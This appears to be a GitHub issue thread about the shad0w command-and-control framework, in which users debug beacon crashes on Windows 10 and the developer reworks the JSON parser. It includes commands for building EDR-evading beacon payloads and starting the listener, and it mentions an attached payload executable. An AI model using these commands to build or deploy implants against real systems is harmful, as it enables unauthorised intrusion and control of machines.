bats3c
commented
3 years ago I've never encountered this error before, thanks for reporting it.
It seems like the C2 is causing this behaviour.
Could you show me the command you used to start it?
Closed quentinhardy closed 3 years ago
bats3c
commented
3 years ago I've never encountered this error before, thanks for reporting it.
It seems like the C2 is causing this behaviour.
Could you show me the command you used to start it?
quentinhardy
commented
3 years ago I have used shad0w listen -e MY_IP_ADDRESS.
I have followed https://blog.dylan.codes/shad0w/ for installation.
quentinhardy
commented
3 years ago Hello,
I have the same error with the exe output: sudo shad0w beacon -p x64/windows/secure -H IP -f exe -o theExe.exe.
It is the same windows machine and in this case Defender AV is disabled.
Do you have a debug option for the beacon for helping you?
bats3c
commented
3 years ago Hey thanks for letting me know, I'm attempting to replicate this. Would it be possible to attach a copy of the faulting beacon?
Yes, you can use the -d flag for both the server an beacon to run them in debug mode.
quentinhardy
commented
3 years ago Of course, see attachment payload_x64_shad0w_192.168.43.150.exe.zip.
Password for the zip file: password
sudo shad0w beacon -p x64/windows/secure -H 192.168.43.150 -f exe -o payload_x64_shad0w_192.168.43.150.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
[+] Created payload_x64_shad0w_192.168.43.150.exe (340992 bytes)With -d option, I don't see any debug output with beacon/exe. Is it normal ? -d in C2 part does not see me interesting debugs for understanding the error.
quentinhardy
commented
3 years ago Hi,
I have done the same test on Windows 10 pro, version 1903 (OS BUILD 18362.592), without Defender enabled, and I have exactly the same error.
Command line I have tested:
shad0w beacon -p x64/windows/secure -H IP -f exe -o theExe.exe
shad0w beacon -p x64/windows/secure -H IP -f exe -d -o theExe.exe
shad0w beacon -p x64/windows/secure/static -H IP -f raw -d -o theRaw.raw
shad0w beacon -p x64/windows/secure -H IP -f raw -d -o theRaw.rawI have tested with the raw output (staged and static) and I have the same error with my loader.
I see the connection back C2 side for these 4 tests but the same JSON error again:
[i] Sending stage IP --> IP (882456 bytes)
[i] Beacon: USER@MACHINENAME (ARCH: x64, OS: Windows 10, Type: SECURE)Important notice: With the static binary (exe), I have not an error:
shad0w beacon -p x64/windows/secure/static -H IP -f exe -d -o theExe.exe
sevagas
commented
3 years ago Hi exactly the same error here with both static binary and secure The only one working is the non static non secure one. (with defender disabled)
bats3c
commented
3 years ago I've been able to replicate, im working on a fix. Should be done fixed in the next couple days
quentinhardy
commented
3 years ago I will re test when the fix will be published. I will keep you informed.
bats3c
commented
3 years ago This issue should be fixed now with the latest commit. I've reworked the JSON parser so the beacons now use a new one.
This also has the added benefit of halving the size of the static beacons.
The issue shouldn't persist for anyone, though you may encounter some other bugs as this was a rather large change to the code base (although I'm pretty sure there won't be any).
Plz give it ago and lemme know if you encounter any issues.
Hello,
I'm testing the project. Good work. Very interesting.
I have generated these 2 payloads:
I have a connection back to the C2 for these 2 payloads but after, I have the following error in the output of the payload (on the target):
The beacon craches on the target.
I can not stop the beacon on the C2. I can't execute Shad0w commands on the beacon.
The target is a Microsoft Windows 10 Home (10.0.19042 N/A Build 19042).
I have done a mistake somewhere ?
Best regards,